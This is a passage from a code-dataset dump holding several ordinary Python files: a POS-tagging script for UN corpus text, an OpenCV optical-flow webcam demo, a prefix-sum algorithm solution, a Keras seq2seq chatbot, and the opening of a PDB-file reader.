src_token_noun, src_noun_list[j_noun][2],\n                                     flag_verb, src_token_verb, src_verb_list[j_verb][2], flag_adj, src_token_adj,\n                                     src_adj_list[j_adj][2])\n            target_file.write(line)\n\n            if flag_noun > 0:\n                if j_noun < (total_process_lines_noun - 1):\n                    j_noun += 1\n                    line_number_noun = src_noun_list[j_noun][0]\n                    src_token_noun = src_noun_list[j_noun][3]\n            if flag_verb > 0:\n                j_verb += 1\n                if j_verb < (total_process_lines_verb - 1):\n                    line_number_verb = src_verb_list[j_verb][0]\n                    src_token_verb = src_verb_list[j_verb][3]\n            if flag_adj > 0:\n                j_adj += 1\n                if 
j_adj < (total_process_lines_adj - 1):\n line_number_adj = src_adj_list[j_adj][0]\n src_token_adj = src_adj_list[j_adj][3]\n\n flag_noun = -1\n flag_verb = -1\n flag_adj = -1\n line_number += 1\n source_file.close()\n target_file.close()\n return\n\n\ndef main():\n # parameters: ratio, filenames\n # percentage of lines for processing\n ratio = 0.01\n\n # prepare the stoplist\n stoplist = stopwords.words('english')\n\n # path for source text (before processing)\n source_txt_rd = './UNv1.0.testset.en'\n # path for source text(after processing)\n source_txt_wr = './UNv1.0.testset.encw'\n\n # path for target text(before processing) --not to process the tgt for now\n target_txt_rd = './UNv1.0.testset.zh'\n # path for target text(after processing)\n # target_txt_wr = './UNv1.0.testset.zhcho'\n\n # compare the number of lines in source and target, if not same, quit\n total_lines = cal_lines(source_txt_rd)\n if len(target_txt_rd) > 3 and total_lines != cal_lines(target_txt_rd):\n print('source and target text have different numbers of lines')\n return\n print('total lines in file = ')\n print(total_lines)\n # calculate the TotalProcessLines\n total_process_lines = int(ratio * total_lines)\n print('total processing lines = ')\n print(total_process_lines)\n\n # initial toke_list(one tokens a sentence maximum)\n src_noun_list = [[-1, -1, -1, '', '']] # line number, match, token position, token, pos\n src_verb_list = [[-1, -1, -1, '', '']] # line number, match, token position, token, pos\n src_adj_list = [[-1, -1, -1, '', '']] # line number, match, token position, token, pos\n # tgt_token_list = [[-1, -1, '']] #line number, token position, token\n for i in range(total_lines - 1):\n src_noun_list.append([-1, -1, -1, '', ''])\n src_verb_list.append([-1, -1, -1, '', ''])\n src_adj_list.append([-1, -1, -1, '', ''])\n # tgt_token_list.append([-1, -1, ''])\n # print(len(src_token_list))\n\n # generate the src token(xxx) and its corresponding POS token with the help of nltk\n\n # read src and tgt files to line lists\n src_total_list = ['']\n # tgt_total_list = ['']\n file_to_list(source_txt_rd, src_total_list)\n # file_to_list(target_txt_rd, tgt_total_list)\n src_total_list.pop(0)\n # tgt_total_list.pop(0)\n\n # for tokens generated, scan the whole file to get a pos-token list, then randomly pick from it\n for i in range(total_lines):\n if i % 3000 == 0:\n print(datetime.datetime.now(), 'check pos, line:', i)\n # process line by line,\n # return from 'check' : match= 1 true or -1 false, token position, token, its POS\n pos_tokens = check_pos_token(src_total_list[i], stoplist)\n src_noun_list[i][0] = i # keep the line number for future sorting\n src_noun_list[i][1] = pos_tokens[0][0] # match or not\n src_noun_list[i][2] = pos_tokens[0][1] # token position\n src_noun_list[i][3] = pos_tokens[0][2] # token\n src_noun_list[i][4] = pos_tokens[0][3] # pos attribute\n src_verb_list[i][0] = i # keep the line number for future sorting\n src_verb_list[i][1] = pos_tokens[1][0] # match or not\n src_verb_list[i][2] = pos_tokens[1][1] # token position\n src_verb_list[i][3] = pos_tokens[1][2] # token\n src_verb_list[i][4] = pos_tokens[1][3] # pos attribute\n src_adj_list[i][0] = i # keep the line number for future sorting\n src_adj_list[i][1] = pos_tokens[2][0] # match or not\n src_adj_list[i][2] = pos_tokens[2][1] # token position\n src_adj_list[i][3] = pos_tokens[2][2] # token\n src_adj_list[i][4] = pos_tokens[2][3] # pos attribute\n\n # delete the no-match record in the token list\n for i in range(total_lines):\n if i % 
3000 == 0:\n print(datetime.datetime.now(), 'delete no-match records, line:', i)\n if src_noun_list[total_lines - 1 - i][1] < 0:\n src_noun_list.pop(total_lines - 1 - i)\n if src_verb_list[total_lines - 1 - i][1] < 0:\n src_verb_list.pop(total_lines - 1 - i)\n if src_adj_list[total_lines - 1 - i][1] < 0:\n src_adj_list.pop(total_lines - 1 - i)\n # shuffle the list and get the first \"n\" of the token list\n list_length = len(src_noun_list)\n if list_length > total_process_lines:\n print('noun list larger than ratio')\n print(list_length)\n random.shuffle(src_noun_list)\n for i in range(list_length - total_process_lines):\n src_noun_list.pop(list_length - 1 - i)\n list_length = len(src_verb_list)\n if list_length > total_process_lines:\n print('verb list larger than ratio')\n print(list_length)\n random.shuffle(src_verb_list)\n for i in range(list_length - total_process_lines):\n src_verb_list.pop(list_length - 1 - i)\n list_length = len(src_adj_list)\n if list_length > total_process_lines:\n print('src list larger than ratio')\n print(list_length)\n random.shuffle(src_adj_list)\n for i in range(list_length - total_process_lines):\n src_adj_list.pop(list_length - 1 - i)\n # sort the remaining token list using line number\n print(datetime.datetime.now(), 'sorting noun list')\n src_noun_list.sort(key=lambda x: x[0])\n print(datetime.datetime.now(), 'sorting verb list')\n src_verb_list.sort(key=lambda x: x[0])\n print(datetime.datetime.now(), 'sorting adj list')\n src_adj_list.sort(key=lambda x: x[0])\n print('line number after sorting: source xxx')\n print('noun list', len(src_noun_list))\n print(src_noun_list)\n print('verb list', len(src_verb_list))\n print(src_verb_list)\n print('adj list', len(src_adj_list))\n print(src_adj_list)\n\n # process ( insert tags) the source and target text file\n # process the source text\n pos_process_src(source_txt_rd, source_txt_wr, src_noun_list, src_verb_list, src_adj_list)\n print('finish processing!')\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CW-tag.py","file_name":"CW-tag.py","file_ext":"py","file_size_in_byte":11778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"628506203","text":"import numpy as np\nimport cv2\nimport time\nimport random\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 854)\ncap.set(4, 480)\n#cap.set(3, 1280)\n#cap.set(4, 720)\n\n\n# params for ShiTomasi corner detection\nfeature_params = dict( maxCorners = 100,\n qualityLevel = 0.3,\n minDistance = 7,\n blockSize = 7 )\n\n# params for lucas kanade optical flow\nlk_params = dict( winSize = (15,15),\n maxLevel = 2,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n\n# red values\ncolor = (0, 0, 255)\n\ncolorList = [ color, (1, 0, 255), (0, 1, 255) ]\n\nfor j in range(1, 30):\n for k in range(1, 30):\n colorList.append( (j, k, 255) )\n\nlower = np.array([17, 15, 100])\nupper = np.array([50, 56, 255])\n\n# Take first frame and find corners in it\nret, old_frame = cap.read()\nold_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)\np0 = cv2.goodFeaturesToTrack(old_gray, mask = None, **feature_params)\n\n# Create a mask image for drawing purposes\nmask = np.zeros_like(old_frame)\n\n#timer\ntimer = time.time()\n\n\nwhile(1):\n #new corners every xxx seconds\n if time.time() - timer > 30:\n mask = np.zeros_like(old_frame)\n timer = time.time()\n\n ret,frame = cap.read()\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # calculate optical flow\n p1, st, err = 
cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)\n\n    if p1 is not None:\n        # Select good points\n        good_new = p1[st==1]\n        good_old = p0[st==1]\n    else:\n        #find some new features\n        ret, old_frame = cap.read()\n        old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)\n        p0 = cv2.goodFeaturesToTrack(old_gray, mask = None, **feature_params)\n        p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)\n        good_new = p1[st==1]\n        good_old = p0[st==1]\n\n    # draw the tracks\n    for i,(new,old) in enumerate(zip(good_new,good_old)):\n        a,b = new.ravel()\n        c,d = old.ravel()\n        mask = cv2.line(mask, (a,b),(c,d), random.choice(colorList), 30)\n        # mask = cv2.line(mask, (a,b),(c,d), color, 30)\n\n    # add optical mask\n    img = cv2.add(frame,mask)\n\n    # red mask\n    redMask = cv2.inRange(img, lower, upper)\n\n    img = cv2.bitwise_and(img, img, mask = redMask)\n    # img = cv2.bitwise_and(img, img, mask = 255 - redMask)\n    \n    cv2.namedWindow(\"flow\", cv2.WND_PROP_FULLSCREEN)\n    cv2.setWindowProperty(\"flow\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n    cv2.imshow(\"flow\",img)\n    k = cv2.waitKey(30) & 0xff\n    if k == 27:\n        break\n\n    # Now update the previous frame and previous points\n    old_gray = frame_gray.copy()\n    p0 = good_new.reshape(-1,1,2)\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"ICAM_FINAL/redOneCh.py","file_name":"redOneCh.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"365312171","text":"#-*- encoding: utf-8 -*-\nimport sys\nr=sys.stdin.readline\n\nN,M = map(int,r().split()) # size of the territory (N x M)\n\npopulation = {0:[0]*(M+1), 1:[0]} # array holding the cumulative population sums from (1,1) up to each (N', M')\n\nfor i in map(int,r().split()): # for the first row, just store the running sum.\n    population[1].append(population[1][-1] + i)\n    \nfor i in range(2, N+1): # from the second row on, compute and store the cumulative sum from (1,1) to each cell.\n    population[i] = [0]\n    row_list = [0] + list(map(int,r().split()))\n    \n    for j in range(1, M+1):\n        population[i].append(row_list[j] + population[i][j-1] + population[i-1][j] - population[i-1][j-1])\n    \n\nK = int(r()) # number of rectangular regions whose population King Jingyeong asks about \n\nfor quest in range(K):\n    x1, y1, x2, y2 = map(int,r().split()) # from x1, y1 to x2, y2\n    total = 0 # total population living there\n    \n    total = population[x2][y2] - population[x2][y1-1] - population[x1-1][y2] + population[x1-1][y1-1]\n    \n    print(total)\n","sub_path":"Algorithm/Baekjoon/15724 주지수/15724.py","file_name":"15724.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"71347495","text":"from tensorflow.keras.utils import to_categorical\r\nfrom tensorflow.keras import Input, Model\r\nfrom tensorflow.keras.layers import Embedding, LSTM, Dense, TimeDistributed, Bidirectional, Concatenate\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\nfrom tensorflow.keras.optimizers import Adam\r\nimport numpy as np\r\nimport pandas as pd\r\nimport sys\r\nimport preprocessing_functions as pp\r\n\r\n\r\n\r\nif len(sys.argv) != 2:\r\n    print(\"Incorrect number of arguments. Please use -train or -talk argument to specify the mode\")\r\n    sys.exit()\r\nelif sys.argv[1] != \"-train\" and sys.argv[1] != \"-talk\":\r\n    print(\"Incorrect argument. 
Please use -train or -talk argument to specify the mode\")\r\n    sys.exit()\r\n\r\n\r\n########################################\r\n#####         DATA LOADING         #####\r\n########################################\r\n\r\n# We load the files containing all the questions and answers\r\nquestions = open('questions.txt', 'r', encoding = 'utf-8', errors = 'ignore').read()\r\nanswers = open('answers.txt', 'r', encoding = 'utf-8', errors = 'ignore').read()\r\nquestions = questions.split('\\n')\r\nanswers = answers.split('\\n')\r\n\r\n# We limit the number of questions and answers due to memory issues\r\ndown = 30000\r\nup = 85000\r\nquestions = questions[down:up]\r\nanswers = answers[down:up]\r\n\r\n\r\n\r\n#########################################\r\n#####         PREPROCESSING         #####\r\n#########################################\r\n\r\n# We clean all the questions and answers\r\n# by removing the abbreviations and punctuations\r\nquestions = pp.cleaner(questions)\r\nanswers = pp.cleaner(answers)\r\n\r\n# We remove questions and answers that are too long;\r\n# these could cause trouble during training\r\nquestions, answers = pp.length_filter(questions, answers, 15, 14)\r\nprint(\"Number of questions: {}\".format(len(questions)))\r\nprint(\"Number of answers: {}\".format(len(answers)))\r\n\r\n# We add the special tokens bos and eos to the answers.\r\nanswers = pp.start_end_adder(answers)\r\n\r\n# We build the token vocabulary\r\nvocab_size = 3876\r\nvocab_size = vocab_size + 3 # to account for the special tokens that are not part of the word stats\r\ntokenizer = pp.vocab_builder(questions + answers, vocab_size, oov_token='unk', number=False)\r\ntokenizer.word_index = {e:i for e,i in tokenizer.word_index.items() if i <= vocab_size}\r\nvocab_size = len(tokenizer.word_index) + 1 # one more to take the PAD token (0) into account\r\nprint('Vocabulary size : {}'.format(vocab_size))\r\n\r\n\r\n# Stats to determine the threshold used for word filtration (Tokenizer) \r\nTH = 6\r\nnb_total_words = 1\r\nocc_total_words = 0\r\nnb_word_less_TH = 0\r\nocc_word_less_TH = 0\r\nfor i, (word, count) in enumerate(tokenizer.word_counts.items()):\r\n    if word != 'bos' and word != 'eos':\r\n        occ_total_words += count\r\n        nb_total_words += 1\r\n        if count < TH:\r\n            occ_word_less_TH += count\r\n            nb_word_less_TH += 1\r\n\r\nprint(\"Number of words: {}\".format(nb_total_words))\r\nprint(\"Number of words with less than {} occurrences: {}\".format(TH, nb_word_less_TH))\r\nprint(\"Percentage of words with less than {} occurrences: {}%\".format(TH, round((occ_word_less_TH/occ_total_words)*100, 3)))\r\nprint(\"Resulting: {}\".format(nb_total_words-nb_word_less_TH))\r\n\r\n\r\n# We tokenize the questions and the answers\r\ntokenized_questions = tokenizer.texts_to_sequences(questions)\r\ntokenized_answers = tokenizer.texts_to_sequences(answers)\r\n\r\n# We determine the maximum lengths\r\nmax_q_length = max([len(x) for x in tokenized_questions])\r\nprint(\"Maximum length of questions: {}\".format(max_q_length))\r\nmax_a_length = max([len(x) for x in tokenized_answers])\r\nprint(\"Maximum length of answers: {}\".format(max_a_length))\r\n\r\n\r\n\r\nif sys.argv[1] == \"-train\":\r\n    \r\n    # We apply padding to the questions and answers to get the encoder & decoder inputs\r\n    encoder_input = pp.padder(tokenized_questions, max_length=max_q_length)\r\n    decoder_input = pp.padder(tokenized_answers, max_length=max_a_length)\r\n    \r\n    # We create the decoder targets by removing special tokens, by applying\r\n    # padding and finally by converting each word into a one-hot 
encoding\r\n for i in range(len(tokenized_answers)):\r\n tokenized_answers[i] = tokenized_answers[i][1:]\r\n padded_answers = pp.padder(tokenized_answers, max_a_length)\r\n decoder_target = to_categorical(padded_answers, num_classes=vocab_size)\r\n\r\n\r\n\r\n#########################################\r\n##### HYPERPARAMETERS #####\r\n#########################################\r\n\r\nHIDDEN_DIM = 128\r\nLOSS_FUNCTION = 'categorical_crossentropy'\r\nLEARNING_RATE = 0.001\r\nBATCH_SIZE = 32\r\nEPOCHS = 150\r\nDROPOUT = 0.5\r\n\r\n\r\n\r\n#########################################\r\n##### Pre-Trained GloVe Embedding #####\r\n#########################################\r\n\r\n# We load the whole embedding into memory\r\nembeddings_index = {}\r\nwith open('glove.6B.100d.txt', encoding='utf-8') as f:\r\n for line in f:\r\n values = line.split()\r\n word = values[0]\r\n coefs = np.asarray(values[1:], dtype='float32')\r\n embeddings_index[word] = coefs\r\n\r\n# we create a matrix of one embedding for each word in the training dataset\r\nembedding_matrix = np.zeros((vocab_size, 100))\r\nfor word, i in tokenizer.word_index.items():\r\n\tembedding_vector = embeddings_index.get(word)\r\n\tif embedding_vector is not None:\r\n\t\tembedding_matrix[i] = embedding_vector\r\n\r\n# We create the embedding layer\r\nembedding_layer = Embedding(input_dim=vocab_size, output_dim=100, trainable=True)\r\nembedding_layer.build((None,))\r\nembedding_layer.set_weights([embedding_matrix])\r\n\r\n\r\n\r\n##########################################\r\n##### SEQ2SEQ TRAINING #####\r\n##########################################\r\n\r\n# --- Encoder part ---\r\n# We instantiate keras tensor\r\nencoder_inputs = Input(shape=(max_q_length,))\r\n# We create an embedding layer that will convert word index into dense vector of fixed size (hidden_dim)\r\nencoder_embedding = embedding_layer(encoder_inputs)\r\n# We create 3 stacked Long Short-Term Memory layer\r\n# The LSTM layer return output, hidden state and cell state\r\nencoder_LSTM_1 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT))\r\nencoder_output_1, forward_encoder_h_1, forward_encoder_c_1, backward_encoder_h_1, backward_encoder_c_1 = encoder_LSTM_1(encoder_embedding)\r\nencoder_h_1 = Concatenate()([forward_encoder_h_1, backward_encoder_h_1])\r\nencoder_c_1 = Concatenate()([forward_encoder_c_1, backward_encoder_c_1])\r\n\r\nencoder_LSTM_2 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT))\r\nencoder_output_2, forward_encoder_h_2, forward_encoder_c_2, backward_encoder_h_2, backward_encoder_c_2 = encoder_LSTM_2(encoder_output_1)\r\nencoder_h_2 = Concatenate()([forward_encoder_h_2, backward_encoder_h_2])\r\nencoder_c_2 = Concatenate()([forward_encoder_c_2, backward_encoder_c_2])\r\n\r\nencoder_LSTM_3 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=False, dropout=DROPOUT))\r\n_, forward_encoder_h_3, forward_encoder_c_3, backward_encoder_h_3, backward_encoder_c_3 = encoder_LSTM_3(encoder_output_2)\r\nencoder_h_3 = Concatenate()([forward_encoder_h_3, backward_encoder_h_3])\r\nencoder_c_3 = Concatenate()([forward_encoder_c_3, backward_encoder_c_3])\r\nencoder_states = [encoder_h_1, encoder_c_1, encoder_h_2, encoder_c_2, encoder_h_3, encoder_c_3]\r\n\r\n# --- Decoder part ---\r\n# We instantiate keras tensor\r\ndecoder_inputs = Input(shape=(max_a_length,))\r\n# We create an embedding layer that will convert word index into dense vector of fixed size 
\r\n\r\n\r\n##########################################\r\n#####       SEQ2SEQ TRAINING        #####\r\n##########################################\r\n\r\n# --- Encoder part ---\r\n# We instantiate a Keras tensor\r\nencoder_inputs = Input(shape=(max_q_length,))\r\n# The shared embedding layer converts word indices into dense vectors of fixed size (100)\r\nencoder_embedding = embedding_layer(encoder_inputs)\r\n# We create 3 stacked Long Short-Term Memory layers\r\n# Each LSTM layer returns its output, hidden state and cell state\r\nencoder_LSTM_1 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT))\r\nencoder_output_1, forward_encoder_h_1, forward_encoder_c_1, backward_encoder_h_1, backward_encoder_c_1 = encoder_LSTM_1(encoder_embedding)\r\nencoder_h_1 = Concatenate()([forward_encoder_h_1, backward_encoder_h_1])\r\nencoder_c_1 = Concatenate()([forward_encoder_c_1, backward_encoder_c_1])\r\n\r\nencoder_LSTM_2 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT))\r\nencoder_output_2, forward_encoder_h_2, forward_encoder_c_2, backward_encoder_h_2, backward_encoder_c_2 = encoder_LSTM_2(encoder_output_1)\r\nencoder_h_2 = Concatenate()([forward_encoder_h_2, backward_encoder_h_2])\r\nencoder_c_2 = Concatenate()([forward_encoder_c_2, backward_encoder_c_2])\r\n\r\nencoder_LSTM_3 = Bidirectional(LSTM(units=HIDDEN_DIM, return_state=True, return_sequences=False, dropout=DROPOUT))\r\n_, forward_encoder_h_3, forward_encoder_c_3, backward_encoder_h_3, backward_encoder_c_3 = encoder_LSTM_3(encoder_output_2)\r\nencoder_h_3 = Concatenate()([forward_encoder_h_3, backward_encoder_h_3])\r\nencoder_c_3 = Concatenate()([forward_encoder_c_3, backward_encoder_c_3])\r\nencoder_states = [encoder_h_1, encoder_c_1, encoder_h_2, encoder_c_2, encoder_h_3, encoder_c_3]\r\n\r\n# --- Decoder part ---\r\n# We instantiate a Keras tensor\r\ndecoder_inputs = Input(shape=(max_a_length,))\r\n# The shared embedding layer converts word indices into dense vectors of fixed size (100)\r\ndecoder_embedding = embedding_layer(decoder_inputs)\r\n# We create 3 stacked Long Short-Term Memory layers; each uses 2*HIDDEN_DIM units\r\n# because the encoder states are concatenations of the forward and backward states\r\ndecoder_LSTM_1 = LSTM(units=2*HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT)\r\ndecoder_output_1, decoder_h_1, decoder_c_1 = decoder_LSTM_1(decoder_embedding, initial_state=[encoder_h_1, encoder_c_1])\r\ndecoder_LSTM_2 = LSTM(units=2*HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT)\r\ndecoder_output_2, decoder_h_2, decoder_c_2 = decoder_LSTM_2(decoder_output_1, initial_state=[encoder_h_2, encoder_c_2])\r\ndecoder_LSTM_3 = LSTM(units=2*HIDDEN_DIM, return_state=True, return_sequences=True, dropout=DROPOUT)\r\ndecoder_output_3, decoder_h_3, decoder_c_3 = decoder_LSTM_3(decoder_output_2, initial_state=[encoder_h_3, encoder_c_3])\r\n# We connect the decoder to the final fully connected (Dense) layer\r\ndense_layer = TimeDistributed(Dense(vocab_size, activation='softmax'))\r\noutputs = dense_layer(decoder_output_3)\r\n\r\n# We put the encoder and decoder together to form the seq2seq model\r\nmodel = Model([encoder_inputs, decoder_inputs], outputs)\r\n# We build and configure the training seq2seq model\r\nopt = Adam(learning_rate=LEARNING_RATE)\r\nmodel.compile(optimizer=opt, loss=LOSS_FUNCTION, metrics=['accuracy'])\r\nmodel.summary()\r\n
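One practical caveat with the training setup above: `to_categorical` materialises the decoder targets as a float tensor of shape `(num_samples, max_a_length, vocab_size)`, which is usually the memory bottleneck of such scripts. A sketch of the standard alternative, keeping integer targets and switching to the sparse loss (this is an option, not what the script actually does; `padded_answers` and `opt` are the objects defined above):

```python
# Sketch: integer targets + sparse loss instead of one-hot targets.
import numpy as np

decoder_target_sparse = np.expand_dims(padded_answers, -1)  # (N, T, 1) int targets
model.compile(optimizer=opt,
              loss='sparse_categorical_crossentropy',
              metrics=['accuracy'])
# model.fit([encoder_input, decoder_input], decoder_target_sparse, ...)
```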
\r\n\r\n\r\nif sys.argv[1] == \"-train\":\r\n    \r\n    ########################################\r\n    #####          TRAINING            #####\r\n    ########################################\r\n\r\n    # We train the network and save the weights\r\n    history = model.fit([encoder_input, decoder_input], \r\n                        decoder_target,\r\n                        validation_split=0.2,\r\n                        batch_size=BATCH_SIZE, \r\n                        epochs=EPOCHS, \r\n                        shuffle=True)\r\n\r\n    # We save the weights\r\n    model.save('weights_{}_{}_adam_3layers_GLOVE_100_BiDir.h5'.format(EPOCHS, BATCH_SIZE))\r\n\r\n    # We save the history of the training\r\n    history_df = pd.DataFrame(history.history)\r\n    with open('training_history_{}_{}_adam_3layers_GLOVE_100_BiDir.csv'.format(EPOCHS, BATCH_SIZE), 'w') as h_csv:\r\n        history_df.to_csv(h_csv)\r\n    print(\"weights and training data have been saved.\")\r\n\r\n\r\nelif sys.argv[1] == \"-talk\":\r\n    \r\n    # If we just want to talk with the chatbot, we load the weights\r\n    # (load_weights works in place, so we must not rebind `model` to its return value)\r\n    model.load_weights('weights_{}_{}_adam_3layers_GLOVE_100_BiDir.h5'.format(EPOCHS, BATCH_SIZE))\r\n    print(\"Model weights have been loaded.\")\r\n    \r\n    \r\n    \r\n    ###########################################\r\n    #####        SEQ2SEQ INFERRING        #####\r\n    ###########################################\r\n    # In this case we have two separate models because the encoder states are fed to the decoder only\r\n    # at the first time step. After that, the last word generated by the decoder and the corresponding cell\r\n    # state and hidden state are given as input to the decoder itself, and so on.\r\n\r\n    # --- Encoder part ---\r\n    # We create the encoder model which will produce the first states used by the decoder\r\n    encoder_model = Model(encoder_inputs, encoder_states)\r\n    encoder_model.summary()\r\n\r\n    # --- Decoder part ---\r\n    # We instantiate the Keras tensors for the states that will be given to the decoder\r\n    decoder_input_h_1 = Input(shape=(2*HIDDEN_DIM,))\r\n    decoder_input_c_1 = Input(shape=(2*HIDDEN_DIM,))\r\n    decoder_input_h_2 = Input(shape=(2*HIDDEN_DIM,))\r\n    decoder_input_c_2 = Input(shape=(2*HIDDEN_DIM,))\r\n    decoder_input_h_3 = Input(shape=(2*HIDDEN_DIM,))\r\n    decoder_input_c_3 = Input(shape=(2*HIDDEN_DIM,))\r\n    decoder_states_inputs = [decoder_input_h_1, decoder_input_c_1, \r\n                             decoder_input_h_2, decoder_input_c_2,\r\n                             decoder_input_h_3, decoder_input_c_3]\r\n    # The LSTM layers return output, hidden state and cell state\r\n    decoder_output, h_1, c_1 = decoder_LSTM_1(decoder_embedding, initial_state=decoder_states_inputs[:2])\r\n    decoder_output, h_2, c_2 = decoder_LSTM_2(decoder_output, initial_state=decoder_states_inputs[2:4])\r\n    decoder_output, h_3, c_3 = decoder_LSTM_3(decoder_output, initial_state=decoder_states_inputs[-2:])\r\n    decoder_states = [h_1, c_1, h_2, c_2, h_3, c_3]\r\n    # We connect the decoder to the final fully connected (Dense) layer\r\n    outputs = dense_layer(decoder_output)\r\n    # We create the decoder model\r\n    decoder_model = Model([decoder_inputs] + decoder_states_inputs, [outputs] + decoder_states)\r\n    decoder_model.summary()\r\n    \r\n    \r\n    \r\n    ############################################\r\n    #####          CHATBOT LOOP            #####\r\n    ############################################\r\n    \r\n    # Function to convert the user's input sentence into a padded token sequence\r\n    def converter(sentence):\r\n        sentence = pp.cleaning(sentence)\r\n        words = sentence.split()\r\n        tokens_seq = []\r\n        for word in words:\r\n            result = tokenizer.word_index.get(word, '')\r\n            if result != '':\r\n                tokens_seq.append(result)\r\n        return pad_sequences([tokens_seq],\r\n                             maxlen=max_q_length,\r\n                             padding='post')\r\n    \r\n    \r\n    for _ in range(100):\r\n        states_values = encoder_model.predict(converter(input('Enter question : ')))\r\n        \r\n        # start with a target sequence of size 1 containing the special token 'bos'\r\n        target_seq = np.zeros((1, 1)) # one line, one column\r\n        target_seq[0, 0] = tokenizer.word_index['bos']\r\n        \r\n        flag = False\r\n        translated_sentence = ''\r\n        \r\n        while not flag:\r\n            # We give the one-word target sequence (initially the special token 'bos') and\r\n            # the state vectors produced by the encoder to the decoder to\r\n            # allow it to produce a prediction for the next word of the sequence.\r\n            o, h1, c1, h2, c2, h3, c3 = decoder_model.predict([target_seq] + states_values)\r\n            \r\n            predicted_word_index = np.argmax(o[0, -1, :])\r\n            predicted_word = None\r\n            \r\n            # We look for the word in our dictionary and stop the process if the\r\n            # special token 'eos' is produced or if the maximum length of answer\r\n            # is exceeded\r\n            for word, index in tokenizer.word_index.items():\r\n                if predicted_word_index == index:\r\n                    if word != 'eos':\r\n                        translated_sentence += ' {}'.format(word)\r\n                    predicted_word = word\r\n            \r\n            if predicted_word == 'eos' or len(translated_sentence.split()) > max_a_length:\r\n                flag = True\r\n            \r\n            # We prepare the next iteration\r\n            target_seq = np.zeros((1, 1))\r\n            target_seq[0, 0] = predicted_word_index\r\n            states_values = [h1, c1, h2, c2, h3, c3]\r\n        \r\n        print(translated_sentence)\r\n","sub_path":"chatbot_try_3layers_BiDir.py","file_name":"chatbot_try_3layers_BiDir.py","file_ext":"py","file_size_in_byte":14532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
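The interactive loop in the `-talk` branch implements greedy decoding, with a linear scan over `word_index` at every step. A compact sketch of the same logic as a reusable helper with a precomputed reverse lookup (the name `respond` is illustrative, not part of the script; `encoder_model`, `decoder_model`, `converter`, `tokenizer` and `max_a_length` are the objects from the `-talk` branch):

```python
import numpy as np

# Reverse lookup built once instead of scanning word_index every step.
index_to_word = {i: w for w, i in tokenizer.word_index.items()}

def respond(sentence):
    states = encoder_model.predict(converter(sentence))
    target = np.zeros((1, 1))
    target[0, 0] = tokenizer.word_index['bos']
    words = []
    while len(words) <= max_a_length:
        out = decoder_model.predict([target] + states)
        o, states = out[0], list(out[1:])
        idx = int(np.argmax(o[0, -1, :]))          # greedy: most probable token
        word = index_to_word.get(idx, 'unk')
        if word == 'eos':
            break
        words.append(word)
        target[0, 0] = idx                          # feed prediction back in
    return ' '.join(words)
```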
 +{"seq_id":"181621900","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# run with protonation: gen_syst1.py qm.tex pdb P\n# run without protonation: gen_syst1.py qm.tex pdb \n\n## program to automate the generation\n## of the syst1 file for quantum refinement\n\n\nimport time\n## set timer\ntime_start = time.time()\nimport sys\n## load mandatory modules\nimport numpy as np\nprint(sys.argv)\nif len(sys.argv)>=2:\n    mm3_input=sys.argv[1]\n    print(\"read from argument 1\")\nelse:\n    mm3_input=\"mm3.pdb\"\n\n\nif len(sys.argv)>=3:\n    input_pdb=sys.argv[2]\n    print(\"read from argument 2\")\nelse:\n    input_pdb=\"pdb\"\n\n\nout_file=\"comqum.pdb\"\n\n\n\ndef read_pdb(input_pdb):\n## reads in pdb coordinates (hardcoded column format)\n##https://zhanglab.ccmb.med.umich.edu/BindProfX/pdb_atom_format.html\n##COLUMNS    DATA TYPE       CONTENTS\n##--------------------------------------------------------------------------------\n ##1 - 6     Record name     \"ATOM  \"\n## 7 - 11    Integer         Atom serial number.\n##13 - 16    Atom            Atom name.\n##17         Character       Alternate location indicator.\n##18 - 20    Residue name    Residue name.\n##22         Character       Chain identifier.\n##23 - 26    Integer         Residue sequence number.\n##27         AChar           Code for insertion of residues.\n##31 - 38    Real(8.3)       Orthogonal coordinates for X in 
